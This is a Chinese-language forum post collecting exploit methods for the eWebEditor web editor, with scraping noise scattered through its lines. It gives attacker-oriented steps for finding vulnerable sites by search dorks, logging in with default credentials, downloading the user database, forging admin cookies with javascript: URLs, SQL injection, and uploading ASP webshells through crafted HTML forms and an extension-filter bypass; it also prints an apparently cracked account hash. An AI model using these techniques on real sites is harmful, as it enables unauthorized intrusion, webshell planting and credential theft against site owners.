eWebEditor.asp?id=45&style=standard1 样式调用
8 n4 K: } L8 f
/ }$ E5 O/ h4 U
( B' x; _) w* e; ?4 ~/edit/admin_uploadfile.asp?id=14&dir=../../..
! v; O5 T& b4 [- E+ L# C7 M1 A% _可以浏览网站目录 ../自己加或者减
$ A( z7 e+ R4 r1 [ }
$ V& m: j: c9 n. G有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞( u. B% u) H: {2 I- Q0 `+ |
简单利用就是. j- Y" j7 g* v* J7 [
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
7 s) l- g6 h; A( ^6 W- V whttp://www.siqinci.com/ewebedito ... amp;style=full_v200
% |, |& |( U% V( y可以利用nbsi进行猜解,对此进行注入
7 ?) m# e% B* B/ X" [还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
4 B) e. {3 \" [/ G# E这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:3 q3 w4 z# l: ~
在action下面* m3 f8 X: Z8 \# z; s& J% f
<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">' U/ i3 j# M8 T; g( q3 x
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">' J* I$ `6 B# z5 i9 N
<input type="submit" name="uploadfile" value="提交">
* F- i; T4 L/ O4 S8 ?. E<input type=hidden name=originalfile value="">
P0 @4 N: B* N$ t; {+ x' x; u6 i* l& i</form>
5 B9 B+ i: y1 t# ]1 ~' ?------------------------------------------------------------------------------------------------------------------------------------------------4 I! n. j0 \% T( ~
<input type="submit" name="uploadfile" value="提交"> 放在action后头
/ h- ` u) x- O, F% J; B( A& D$ ~,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
( S7 b Z0 ?+ L/ k6 W3 H. c
! Y2 {* [5 a* c2 _# b8 A3 z" o
0 R! _, L; y- S# X6 t+ b# n c T8 \! j) m' \
: E7 _9 Z: ?% {+ P( S! S& o- `
Ewebeditor最新漏洞及漏洞大全[收集] (图)$ `3 O0 A1 t6 G7 `
本帖最后由 administrator 于 2009-7-7 21:24 编辑* T1 k& h9 Q: W& [- l
; t2 m: }5 X! Y. w: M3 p# A以下文章收集转载于网络1 c" R! A+ p# V/ U& L% O7 r
#主题描述# ewebeditor 3.8漏洞[php]! P% o: c* Y$ N+ m$ L+ I4 {
--------------------------------------------------------------------------------------------5 i- e3 [6 k" g( n' O
#内容#) _3 L: A% s+ w* c) i" r" Y; \' [( w
php版ewebeditor 3.8的漏洞- y- a; J5 ?8 j# j6 k8 f
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:" Q$ ^3 P. G* Z' i
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
$ ] a& C% U0 \8 |# b% B( X2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
* H+ l7 x3 E4 h( T7 t9 v3 后面的利用和asp一样,新增样式修改上传,就ok了
+ Q9 d9 y0 i# v% J测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
9 C0 v* B. W1 q. {2 `! aaspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
! I6 j: Y$ O0 @4 r/ H5 ?jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了1 t9 @+ N" ]) `( K9 _
--------------------------------------------------------------------------------------------/ g8 T6 B! o8 B, u. x) v+ H
+ U8 x2 w2 v( @! w0 I" x) M
$ ?; ~) u3 s) x; K! F算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。( t! i8 m4 f" q* y& o4 Q
5 O! p4 h3 G/ n! Q; B) U+ d漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
: V: f, K0 R: f/ E" k9 R+ [ ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
! L I9 }, @4 Y% |' F那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址
! J' y, W( c9 @. d: y6 |$ U1 N$ {* I# }! C. j" o
! w! d, J# j' y4 W: Y4 ]
然后确定以后,这里是最关键的一部!* t. Q& h/ @& s" V n. B9 p3 `
这里点了远程上传以后,再提交得到木马地址. B6 U3 l0 G' O, r; M7 W. Y* D. |
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
5 _" g" }) m. B属于安全检测漏洞版本ewebeditor v6.0.0! E: d, R; f2 Y, J8 O) L
; n# f( X/ H; f$ G以前的ewebeditor漏洞:1 G" O9 @& t/ b
* z' d- D/ H0 |: i/ z2 j n- H Lewebeditor注入漏洞
) \, h- O5 r# f& `8 J B
D6 J \2 T, y7 W; z" g大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
. f& q0 q. P$ ?- ]* k: Q1 v# ?; ]默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
% J/ P/ |. u* K) l9 N今天我给大家带来的也是ewebeditor编辑器的入侵方法 T! g# C4 @* L7 Q9 Y, D
不过一种是注入,一种是利用upload.asp文件,本地构造# Z2 Y6 v4 F# P1 u( C- L- R
NO1:注入# ^6 R* n7 y; H7 E& R8 f9 v
http://www.XXX.com/ewebeditor200 ... amp;style=full_v2007 |3 L1 t' K. q" x7 d+ c4 X
编辑器ewebedior7以前版本通通存在注入
U+ L9 a, B5 i& d- X1 x, O直接检测不行的,要写入特征字符
, P# g5 |0 T7 w我们的工具是不知道ewebeditor的表名的还有列名# `) ]: l. g2 e! c5 I% L
我们自己去看看, ]7 a7 i [6 D' H1 K6 ~- ^
哎。。先表吧* |( @4 T3 p6 L
要先添加进库
7 y( c, W3 M3 H. n开始猜账号密码了1 f# w) L" B( E" _! w& W, E
我们==
, a& O% s6 r% w( m, @& N: U( ?心急的往后拉
$ h! e, i) q" c( @0 Y出来了# d. y a! p- u* F3 }& p9 _' {
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 8511205 R' u! B% A9 E: i7 t; v
对吧^_^2 r& h/ Q1 E( |. @$ L. a
后面不说了
0 f3 I3 ]1 Z3 s/ `NO2:利用upload.asp文件,本地构造上传shell
; q. h4 G+ ?8 g( a8 c( h0 J* ?大家看这里
- m- Y3 M/ U& ^# Qhttp://www.siqinci.com/ewebedito ... lepreview&id=37! q8 C/ `7 P& P z
如果遇见这样的情况又无法添加工具栏是不是很郁闷
) g: I! B. i& g" D现在不郁闷了,^_^源源不一般* \+ d+ w6 a! {0 d& ^
我们记录下他的样式名“aaa”
9 I- u6 K, ~3 w1 r5 l我已经吧upload.asp文件拿出来了3 }4 p2 W4 p3 n: x
我们构造下 B0 i( [& x. [ s
OK,我之前已经构造好了
1 B& ~, |* v9 \4 t9 E: J0 C& Q1 o其实就是这里9 X- i& a1 s5 j( L/ b" b
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>' z( P$ v- n& \# X) f* l0 P* ]
<input type=file name=uploadfile size=1 style=”width:100%”>
3 F- h8 t" `# H: k6 h- y9 R9 Y' e<input type=submit value=”上传了”></input>. |( g* H! T; P9 s7 y
</form>, b T4 {' f0 S c5 ^$ E/ D* y
下面我们运行他上传个大马算了) q+ T- N8 M: d% ~. p) h
UploadFile上传进去的在这个目录下' F' L0 a9 ?5 a0 p
2008102018020762.asa
4 b7 ^! y" q5 U- S! a. j: C$ |9 ~& a/ t' c) Y
过往漏洞:- y: p q& k7 g' o* W& o# U
! w: A' Q1 L& j- |
首先介绍编辑器的一些默认特征:+ m8 U6 m* b' l9 B9 E% Y1 ~7 S
默认登陆admin_login.asp
# x/ ?' Z0 k: P5 I7 p7 d) L0 m" k默认数据库db/ewebeditor.mdb
: L F+ ?) s4 ]$ l, }' M( p" l默认帐号admin 密码admin或admin888% J* ^! G( D. B- C; r
搜索关键字:”inurl:ewebeditor” 关键字十分重要% o/ q C! ^3 l! u; x% B/ J* `& C/ W
有人搜索”eWebEditor - eWebSoft在线编辑器”6 O5 V% g7 Y# Q0 B7 d; S
根本搜索不到几个~
$ p9 }# L" B, G; e8 W6 [baidu.google搜索inurl:ewebeditor: |, c4 A2 W2 F N% {5 J
几万的站起码有几千个是具有默认特征的~3 e0 {) J4 ]0 L$ d
那么试一下默认后台
, @( I) t9 ~4 A* A9 [+ S8 Ihttp://www.xxx.com.cn/admin/ewebeditor/admin_login.asp% f! t n( t: K/ C9 m; @
试默认帐号密码登陆。
6 d: s. z& \+ A/ l利用eWebEditor获得WebShell的步骤大致如下:& P8 N# }( \: O) U
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
- @5 G9 |. H* z9 D8 b t" K0 V2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。; W3 X O# S2 t% x" a6 w; D
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
# }6 V# \0 R0 [$ K& W! H# J如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!7 M N" k* x o7 _7 p2 B: _+ K
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。4 n( p; S* D3 W( V1 P7 o& @# d
然后在上传的文件类型中增加“asa”类型。
5 A" M% q( L* T( q5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。( W9 J4 w5 ]! Z# D& E7 q$ ^; P7 V
漏洞原理
" U' T' N% w% d3 E漏洞的利用原理很简单,请看Upload.asp文件:. V# ]& v+ ~) H3 _3 o
任何情况下都不允许上传asp脚本文件1 u7 L* v/ F- r @. d) z
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
8 M/ c1 ]4 q+ B% h5 O/ {1 k- o7 _因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!2 X [; i" h2 @
高级应用
2 G! ] g' {9 F/ leWebEditor的漏洞利用还有一些技巧:
: d8 N/ }, ?) C6 S2 O) j2 n1.使用默认用户名和密码无法登录。
5 q" G. S0 ]0 w: j. x( I请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。0 w$ n' v h* K3 a$ H1 L# K9 Y( c
2.加了asa类型后发现还是无法上传。
. A. B) q5 N& x( F( ^( V8 Q应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:1 h, `& ^( l1 S& t
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
+ `: P0 y- I3 o' \6 u% R6 J$ b猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
3 @. y7 G/ H* |+ T# K: Q$ @$ X3.上传了asp文件后,却发现该目录没有运行脚本的权限。( }) y" ~8 o+ q+ A5 ^/ u1 k
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。! R, M. j) [9 n- Y- Z x
4.已经使用了第2点中的方法,但是asp类型还是无法上传。( m0 K) k# x4 B+ _: |5 P
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。$ O) ~; h! w: b N$ O E( V
后记
7 C9 U0 q: v5 W+ \1 C9 a根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!* ?0 v- A8 D9 D" x6 b
基本入侵基础漏洞
( E5 V, n) S0 K( I' t; [eWebEditor 漏洞
3 A& A7 M& F) E# A% o6 C5 a! f9 I8 E, X3 I+ g- l2 t ?$ Z) v& Y
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
8 Z1 h, x/ C" [9 _- y
; b0 @& ~( u& m# P. Y7 U漏洞利用, M! Q: g# i: S& _. H2 }
利用eWebEditor获得WebShell的步骤大致如下:0 O9 {8 G) a8 B4 E, `& N1 x- h
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。; K! X% `" c. M- P- g: [. Z
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
+ e; C4 k/ T" b6 F" m3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。* P7 W/ ~5 U, R1 T# E2 w& q
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
/ } J5 D/ V. C4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
* E1 ~( e) Q. h* Y3 {" \) `9 n
- A# \5 U$ z ]' ^2 s" a) u, O) J然后在上传的文件类型中增加“asa”类型。
% x7 O: E' @: ~: q% ?0 g2 r8 a9 p8 i# T; X$ _
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
0 `8 t6 I! i9 n& O* q& U" `) X6 P' `# S! T4 N& X
( R2 ~0 w3 C2 k" y! |# K# p# _
漏洞原理
9 K0 E/ B* A: T: n, p漏洞的利用原理很简单,请看Upload.asp文件:, |5 E# G& }0 C; J
任何情况下都不允许上传asp脚本文件, X8 F$ R8 P' d6 Q6 X/ M, o
sAllowExt = replace(UCase(sAllowExt), "ASP", "")4 [- d( F0 ~4 L1 W. e E4 b+ f
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
+ e" F1 t- p: X1 D. p& v4 D$ ^( z/ ]2 S; q% V0 ]
高级应用: I$ q: W' k9 N+ J2 w5 ~0 h
eWebEditor的漏洞利用还有一些技巧:* g' n* M- _0 m9 B
1.使用默认用户名和密码无法登录。
3 t% T; a5 p3 S7 j5 @" L请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。
: ^9 e+ X% }0 S+ Q( [2.加了asa类型后发现还是无法上传。) y/ z) `! y- F. t
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
. k; u+ Y9 E; V$ K p2 MsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", ""): p4 ?: E* P9 Z( E/ ^" |
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
% Q7 m/ i4 x R! Q3.上传了asp文件后,却发现该目录没有运行脚本的权限。
3 ], u5 e/ j/ K B4 q3 B @呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
, v) t4 ?. J+ X3 P7 z9 p& h# z7 H7 p4.已经使用了第2点中的方法,但是asp类型还是无法上传。6 x8 Z$ i3 ~8 j/ L3 S# F1 b6 ~; g
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
" [( X: Y, w- `. r
/ j6 w/ K: z' k# H后记
! n# ]8 I, y* l& R7 E根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
分享
支持
反对